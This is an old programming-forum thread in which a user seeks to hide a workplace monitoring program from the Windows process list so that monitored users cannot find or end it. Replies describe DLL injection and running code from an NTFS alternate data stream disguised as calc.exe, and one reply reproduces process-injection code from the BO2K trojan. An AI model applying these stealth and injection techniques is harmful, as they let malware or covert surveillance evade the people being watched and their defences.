Tweet
Anyone know how? I don't want the process to show at all.
------------------
-Greg
------------------
-Greg
-
-
You can use RegisterServiceProcess to hide it from the Task List, but you cant hide from the Process List as such - at least, not if youre a running process
but have a look through Semen's posts, he's written a couple of amazing DLLs that inject into already-running processes. You could also make a DLL that is loaded by a system process, but that may also be tricky. Another option is to make a base service provider - eg. DLLs registered with Regsvr32.exe, theyre always running but never show in the process list
in Win98 you can 'patch' the Toolhelp APIs to render your process hidden, but it cant be applied to NT/2K
One thing you can do however, is to run your program from a stream. For example, copy it across to c:\winnt\calc.exe:mystream
Youve got two files in one - calc.exe (MS Calc), and calc.exe:mystream (your prog). You cant use Start | Run to execute streams, but you can do it programmatically using a call to ShellExecute()
Then look at your process list - you'll just see "calc.exe" but you wont see "calc.exe:mystream", even though that's what is actually running. This is only a visual deception though, as the process list APIs still reveal the full path, its just that Task Manager for some reason chooses to ignore the stream segment of the filename
Best of luck!
Wayne
------------------
- -
From www.sourceforge.net/projects/bo2k
------------------Code:if(g_bIsWinNT) { //---------------------- WINDOWS NT PROCESS HIDE ------------------- // ------------------------------------------------------- // -- Process Hiding Code // -- Note that there are several different ways to do // -- what this code does. Both of the methods presented // -- below were written specifically to avoid accessing // -- the original BO2K image on disk. // -- This way, the original BO2K disk file can be compressed // -- with all of the plugin attachments inside, and // -- the original executable can be moved around/deleted // -- while the BO2K server still runs. // Get another process and thread id PROCESSINFO *ppie,*ppi=CreateProcListSnapshot(NULL); DWORD dwThreadID, dwProcID; for(ppie=ppi;ppie!=NULL;ppie=ppie->next) { if(lstrcmpi(ppie->svApp,svProcess)==0) break; } if(ppie==NULL) return FALSE; dwProcID=ppie->dwProcID; dwThreadID=ppie->pThread->dwThreadID; // Get first thread (doesn't really matter) DestroyProcListSnapshot(ppi); // Make sure we aren't hopping into ourselves if(GetCurrentProcessId()==dwProcID) return FALSE; // Open process to inject code into HANDLE hProc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwProcID); if(hProc==NULL) { DebugMessageBox(NULL,"Unable to open process","ERROR",MB_SETFOREGROUND); return FALSE; } // Free space for BO2K (in case we are restarting) pVirtualFreeEx(hProc,g_module,0,MEM_RELEASE); // Allocate space for BO2K to fit in the process DWORD dwSize=((PIMAGE_OPTIONAL_HEADER)OPTHDROFFSET(g_module))->SizeOfImage; char *pMem=(char *)pVirtualAllocEx(hProc,g_module,dwSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE); if(pMem==NULL) { DebugMessageBox(NULL,"Couldn't VirtualAllocEx","Error",MB_SETFOREGROUND); return FALSE; } // Lets copy the entire bo2k process into this space. DWORD dwOldProt,dwNumBytes,i; MEMORY_BASIC_INFORMATION mbi; pVirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION)); while(mbi.Protect!=PAGE_NOACCESS && mbi.RegionSize!=0) { if(!(mbi.Protect & PAGE_GUARD)) { for(i=0;i<mbi.RegionSize;i+=0x1000) { pVirtualProtectEx(hProc,pMem+i,0x1000,PAGE_EXECUTE_READWRITE,&dwOldProt); WriteProcessMemory(hProc,pMem+i,pMem+i,0x1000,&dwNumBytes); } } pMem+=mbi.RegionSize; pVirtualQueryEx(hProc,pMem,&mbi,sizeof(MEMORY_BASIC_INFORMATION)); } // Create a remote thread in the other process DWORD dwRmtThdID; HANDLE hRmtThd=pCreateRemoteThread(hProc,NULL,0,EntryPoint,(LPVOID)g_module,0,&dwRmtThdID); if(hRmtThd==NULL) { DebugMessageBox(NULL,"Could create remote thread","ERROR",MB_SETFOREGROUND); return FALSE; } CloseHandle(hProc); return 0;
Sven Blumenstein
IT-Trainee at DECOMA Exterior Systems, Germany
E-Mail: mailto:[email protected][NOSPAM]cycos.net[email protected][NOSPAM]cycos.net</A>
Programming with: PB/DLL, MASM, VB, VC++, LCC, VBA, WMLComment
-
But... but... its C++
[This message has been edited by Wayne Diamond (edited October 15, 2001).]-Comment
-
Sven,
Anyhelp in converting to PB? Haven't programmed in C++ since
high school.
------------------
-GregComment
-
I know just enough C++ to install Visual Studio, sorry I can't help more with that
------------------
-Comment
-
I just gotta ask:
Why hide the process from the task list at all?
In fact, why even hide the process from the task bar?
My view: If it's a process, let it behave like a process, for crying out loud.
If you don't want to spawn a second process, put it in a separate thread of execution!
(I'm sure someone will give me a reasonable explanation of this penchant for hiding things).
MCM
Michael Mattias
Tal Systems (retired)
Port Washington WI USA
[email protected]
http://www.talsystems.comComment
-
well my app is for Management audting, they want to see how much
time each window is active for a given user. They don't want
the user trying to end the task though.
------------------
-GregComment
-
How does keeping a process off the task list aid this?well my app is for Management audting, they want to see how much
time each window is active for a given user. They don't want
the user trying to end the task though.
Besides, you can track how much time a user spends in each Window easily enough by trapping the WM_SETFOCUS and WM_KILLFOCUS messages.
MCM
Michael Mattias
Tal Systems (retired)
Port Washington WI USA
[email protected]
http://www.talsystems.comComment
-
Michael,
I seem confused. How does trapping WM_SETFOCUS and WM_KILLFOCUS
on my app track usage on all apps on users work station?
Getting the time is the easy part, I just need help hiding
the app from the process list in NT.
------------------
-Greg
[This message has been edited by Gregery D Engle (edited October 15, 2001).]Comment
-
Well, you've confused me. You said,I seem confused. How does trapping WM_SETFOCUS and WM_KILLFOCUS
on my app track usage on all apps on users work station?
There's a difference between how much time one spends in window (which I interpreted as "time spent in any given window of a given application" and how much time users spend in any given application of a suite of different applications.well my app is for Management audting, they want to see how much
time each window is active for a given user...
To answer your question, trapping messages in any one application does nothing for logging time across multiple applications.
FIWI, there's probably some "hook process" method to trap messages across applications, though.
But I digress ... or do I? What does hiding a process from the task list have to do with logging the time spent using that process?
MCM
Michael Mattias
Tal Systems (retired)
Port Washington WI USA
[email protected]
http://www.talsystems.comComment
-
> What does hiding a process from the task list
> have to do with logging the time spent using
> that process?
Nothing, at least not directly. But it keeps the user (who is being monitored) from using the Windows Task Manager to end-task the program that is doing the monitoring. In fact it makes it so that the program can't be easily detected by the user in the first place.
-- Eric
------------------
Perfect Sync Development Tools
Perfect Sync Web Site
Contact Us: mailto:[email protected][email protected]</A>"Not my circus, not my monkeys."Comment
-
-
OK, now I understand. The "time" considerations are indirect. The real challenge is preventing unauthorized task termination!.. it keeps the user (who is being monitored) from using the Windows Task Manager to end-task the program that is doing the monitoring. In fact it makes it so that the program can't be easily detected by the user in the first place.
I knew there had to be some kind of reason.
MCM
Michael Mattias
Tal Systems (retired)
Port Washington WI USA
[email protected]
http://www.talsystems.comComment
Comment